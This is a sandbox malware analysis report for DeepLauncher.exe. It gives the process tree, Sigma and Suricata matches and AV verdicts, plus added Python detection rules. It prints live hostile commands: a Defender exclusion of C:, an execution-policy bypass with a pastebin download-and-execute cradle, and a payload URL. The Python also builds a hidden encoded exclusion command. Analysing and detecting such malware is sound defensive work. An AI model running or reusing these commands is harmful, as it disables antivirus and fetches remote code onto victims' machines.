Windows Analysis Report
DeepLauncher.exe

Overview

General Information

Sample name: DeepLauncher.exe
Analysis ID: 1617346
MD5: 34610a77f1796284eb482d216f3fa891
SHA1: d33e985b4778ccdec0033a8dcb0b2c5511c07571
SHA256: ed5f6c3296707be4114467eca72350b62409d9421f4b755a37c59d5e7b52f806
Tags: exe, WHKzW2nr, user-JAMESWT_MHT

Detection

Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • DeepLauncher.exe (PID: 7160 cmdline: "C:\Users\user\Desktop\DeepLauncher.exe" MD5: 34610A77F1796284EB482D216F3FA891)
    • powershell.exe (PID: 7212 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7320 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7444 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • csc.exe (PID: 7676 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 7764 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES27FB.tmp" "c:\Users\user\AppData\Local\Temp\ued2riov\CSCAE107C6CD7AF4B418D296C50EC1D4A12.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 8072 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DeepLauncher.exe", ParentImage: C:\Users\user\Desktop\DeepLauncher.exe, ParentProcessId: 7160, ParentProcessName: DeepLauncher.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 7444, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DeepLauncher.exe", ParentImage: C:\Users\user\Desktop\DeepLauncher.exe, ParentProcessId: 7160, ParentProcessName: DeepLauncher.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 7212, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DeepLauncher.exe", ParentImage: C:\Users\user\Desktop\DeepLauncher.exe, ParentProcessId: 7160, ParentProcessName: DeepLauncher.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 7444, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7444, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.cmdline", ProcessId: 7676, ProcessName: csc.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DeepLauncher.exe", ParentImage: C:\Users\user\Desktop\DeepLauncher.exe, ParentProcessId: 7160, ParentProcessName: DeepLauncher.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 7444, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DeepLauncher.exe", ParentImage: C:\Users\user\Desktop\DeepLauncher.exe, ParentProcessId: 7160, ParentProcessName: DeepLauncher.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 7212, ProcessName: powershell.exe
Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DeepLauncher.exe", ParentImage: C:\Users\user\Desktop\DeepLauncher.exe, ParentProcessId: 7160, ParentProcessName: DeepLauncher.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 7444, ProcessName: powershell.exe
Source: Process started | Author: frack113, Nasreddine Bencherchali | Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES27FB.tmp" "c:\Users\user\AppData\Local\Temp\ued2riov\CSCAE107C6CD7AF4B418D296C50EC1D4A12.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES27FB.tmp" "c:\Users\user\AppData\Local\Temp\ued2riov\CSCAE107C6CD7AF4B418D296C50EC1D4A12.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentProcessId: 7676, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES27FB.tmp" "c:\Users\user\AppData\Local\Temp\ued2riov\CSCAE107C6CD7AF4B418D296C50EC1D4A12.TMP", ProcessId: 7764, ProcessName: cvtres.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7444, TargetFilename: C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.cmdline
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DeepLauncher.exe", ParentImage: C:\Users\user\Desktop\DeepLauncher.exe, ParentProcessId: 7160, ParentProcessName: DeepLauncher.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 7212, ProcessName: powershell.exe
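The Sigma matches above key on three things that are visible in the process tree: Add-MpPreference -ExclusionPath launched from PowerShell, -ExecutionPolicy Bypass combined with an iex/iwr download cradle, and csc.exe spawned by PowerShell on a .cmdline file under %TEMP%. The CommandLine|base64offset|contains fields show how the same rules also look for the cmdlet when it is hidden behind -EncodedCommand, which PowerShell accepts as base64 of UTF-16LE. The Python below is an added example, not part of the Joe Sandbox report and not the code of any published Sigma rule: it implements those checks over Sysmon-style process-creation events. The three observed command lines are copied from the process tree; the encoded variant, the rule names and the field layout are this example's own assumptions.

```python
import base64
import re


def base64offset_variants(value: bytes) -> list:
    """Sigma's base64offset modifier: the three fragments that appear in
    base64(X + value + Y) for any X, Y, one per byte alignment of `value`.
    Characters polluted by the padding prefix or by the unknown bytes that
    follow are trimmed, so each fragment is exact at its alignment."""
    start = (0, 2, 3)       # leading chars to drop for a prefix of 0, 1, 2 bytes
    end = (None, -3, -2)    # trailing chars to drop, indexed by (len + prefix) % 3
    variants = []
    for prefix in range(3):
        enc = base64.b64encode(b"\x00" * prefix + value).decode("ascii")
        variants.append(enc[start[prefix]:end[(len(value) + prefix) % 3]])
    return variants


def b64_contains(blob: str, needle: str, utf16le: bool = True) -> bool:
    """True if `needle` occurs in the data that `blob` base64-encodes.
    PowerShell -EncodedCommand wraps UTF-16LE, hence the default."""
    raw = needle.encode("utf-16le" if utf16le else "utf-8")
    return any(v in blob for v in base64offset_variants(raw))


def encode_powershell(command: str) -> str:
    """The argument an attacker passes to `powershell -EncodedCommand`."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


POWERSHELL = ("powershell.exe", "pwsh.exe")
ENC_FLAG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def _image(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_defender_exclusion(e: dict) -> bool:
    return _image(e["Image"]) in POWERSHELL and re.search(
        r"add-mppreference\b.*-exclusion(?:path|process|extension)", e["CommandLine"], re.I) is not None


def is_encoded_mppreference(e: dict) -> bool:
    if _image(e["Image"]) not in POWERSHELL:
        return False
    m = ENC_FLAG.search(e["CommandLine"])
    return bool(m) and b64_contains(m.group(1), "MpPreference")


def is_execution_policy_bypass(e: dict) -> bool:
    # -ExecutionPolicy, -exec and -ep are all accepted by powershell.exe
    return _image(e["Image"]) in POWERSHELL and re.search(
        r"-e(?:p|x\w*)\s+(?:bypass|unrestricted)", e["CommandLine"], re.I) is not None


def is_download_cradle(e: dict) -> bool:
    cmd = e["CommandLine"]
    return (re.search(r"\b(?:iex|invoke-expression)\b", cmd, re.I) is not None
            and re.search(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
                          r"downloadfile|net\.webclient)\b", cmd, re.I) is not None)


def is_dynamic_compilation(e: dict) -> bool:
    return (_image(e["Image"]) in ("csc.exe", "vbc.exe")
            and _image(e.get("ParentImage", "")) in POWERSHELL
            and re.search(r"\\appdata\\local\\temp\\.*\.cmdline", e["CommandLine"], re.I) is not None)


RULES = {
    "defender_exclusion": is_defender_exclusion,
    "encoded_mppreference": is_encoded_mppreference,
    "execution_policy_bypass": is_execution_policy_bypass,
    "download_cradle": is_download_cradle,
    "dynamic_compilation": is_dynamic_compilation,
}


def evaluate(event: dict) -> list:
    """Names of the rules an event matches, in RULES order."""
    return [name for name, rule in RULES.items() if rule(event)]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # The three process starts from the report's process tree:
    {"Image": PS, "ParentImage": r"C:\Users\user\Desktop\DeepLauncher.exe",
     "CommandLine": "\"powershell.exe\" Add-MpPreference -ExclusionPath 'C:'"},
    {"Image": PS, "ParentImage": r"C:\Users\user\Desktop\DeepLauncher.exe",
     "CommandLine": '"powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr '
                    '"https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"'},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe", "ParentImage": PS,
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths '
                    r'@"C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.cmdline"'},
    # Constructed (not observed in the report): the same exclusion behind -EncodedCommand.
    {"Image": PS, "ParentImage": r"C:\Users\user\Desktop\DeepLauncher.exe",
     "CommandLine": '"powershell.exe" -nop -w hidden -enc '
                    + encode_powershell("Add-MpPreference -ExclusionPath 'C:'")},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(evaluate(ev) or ["-"], _image(ev["Image"]), ev["CommandLine"][:60])
```

base64offset_variants is the part worth understanding: a string can land at any of three byte alignments inside a base64 stream, so matching on a single base64(needle) misses two of three placements, and the trimmed variants are what make the encoded check exact. Note that the check is scoped to an -enc argument; a plain-text exclusion, as in this sample, is caught by the first rule, and the exclusion of the whole of C: is what makes the later Music.exe drop invisible to Defender.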

Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7444, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.cmdline", ProcessId: 7676, ProcessName: csc.exe
Suricata IDS alerts

Timestamp                        SID      Severity  Classtype                Source IP    Source Port  Destination IP   Destination Port  Protocol
2025-02-17T19:47:03.004157+0100  2803305  3         Unknown Traffic          192.168.2.7  49880        104.26.12.205    80                TCP
2025-02-17T19:47:03.937311+0100  2803305  3         Unknown Traffic          192.168.2.7  49886        208.95.112.1     80                TCP
2025-02-17T19:47:07.937328+0100  2803305  3         Unknown Traffic          192.168.2.7  49912        72.5.43.195      80                TCP
2025-02-17T19:47:08.873338+0100  1810007  1         Potentially Bad Traffic  192.168.2.7  49917        149.154.167.220  443               TCP
2025-02-17T19:47:04.958056+0100  1810009  1         Potentially Bad Traffic  192.168.2.7  49892        149.154.167.220  443               TCP
2025-02-17T19:46:34.004200+0100  1810000  2         Potentially Bad Traffic  192.168.2.7  49705        104.20.3.235     443               TCP

AV Detection

Source: http://72.5.43.195:80/8 | Avira URL Cloud: Label: malware
Source: http://72.5.43.195/Music.exe: | Avira URL Cloud: Label: malware
Source: http://72.5.43.195/Music.exe | Avira URL Cloud: Label: malware
Source: DeepLauncher.exe | Virustotal: Detection: 15%
Source: DeepLauncher.exe | ReversingLabs: Detection: 24%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.6% probability
Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49892 version: TLS 1.2
Source: DeepLauncher.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: System.Runtime.Serialization.Primitives.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2563468243.000001F3307A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Diagnostics.TraceSource.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2563393856.000001F330790000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563277960.000001F330771000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Runtime.InteropServices.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2562970930.000001F330701000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563088639.000001F330730000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: DeepLauncher.exe, 00000000.00000002.2563165264.000001F330741000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563203699.000001F330760000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Drawing.Common/Release/net8.0/System.Drawing.Common.pdb source: DeepLauncher.exe, 00000000.00000002.2566107474.00000233C5430000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566221492.00000233C54B1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2569211926.00000233C6EF0000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2570342977.00000233C75A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2562578727.000001F32EF01000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562624925.000001F32EF10000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Claims.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.pdbhP= source: powershell.exe, 00000008.00000002.1386081536.0000024104360000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: DeepLauncher.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: DeepLauncher.exe, 00000000.00000002.2566427663.00000233C5580000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5B11000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.TraceSource\Release\net8.0\System.Diagnostics.TraceSource.pdb source: DeepLauncher.exe, 00000000.00000002.2563393856.000001F330790000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563277960.000001F330771000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdb source: DeepLauncher.exe, 00000000.00000002.2563468243.000001F3307A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdbSHA256 source: DeepLauncher.exe, 00000000.00000002.2563468243.000001F3307A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Security.Principal.Windows.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2566297559.00000233C5531000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566027392.00000233C5400000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: DeepLauncher.exe, 00000000.00000002.2562578727.000001F32EF01000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562624925.000001F32EF10000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: DeepLauncher.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdbSHA256 source: DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A18000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A10000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Windows.Forms/Release/net8.0/System.Windows.Forms.pdb source: DeepLauncher.exe, 00000000.00000002.2569211926.00000233C6EF0000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2570342977.00000233C75A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Claims\Release\net8.0\System.Security.Claims.pdb source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Drawing.Common/Release/net8.0/System.Drawing.Common.pdbSHA256 source: DeepLauncher.exe, 00000000.00000002.2566107474.00000233C5430000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566221492.00000233C54B1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.ComponentModel.EventBasedAsync.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2566373042.00000233C5571000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: DeepLauncher.exe, 00000000.00000002.2562350709.000001F32EEB1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Threading.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2563165264.000001F330741000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563203699.000001F330760000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: DeepLauncher.exe, 00000000.00000002.2562497945.000001F32EEF0000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562423615.000001F32EED1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: DeepLauncher.exe, 00000000.00000002.2562970930.000001F330701000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563088639.000001F330730000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.ServicePoint.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A18000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A10000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Specialized\Release\net8.0\System.Collections.Specialized.pdb source: DeepLauncher.exe, 00000000.00000002.2563012536.000001F330710000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562892333.000001F3306F1000.00000020.00001000.00020000.00000000.sdmp
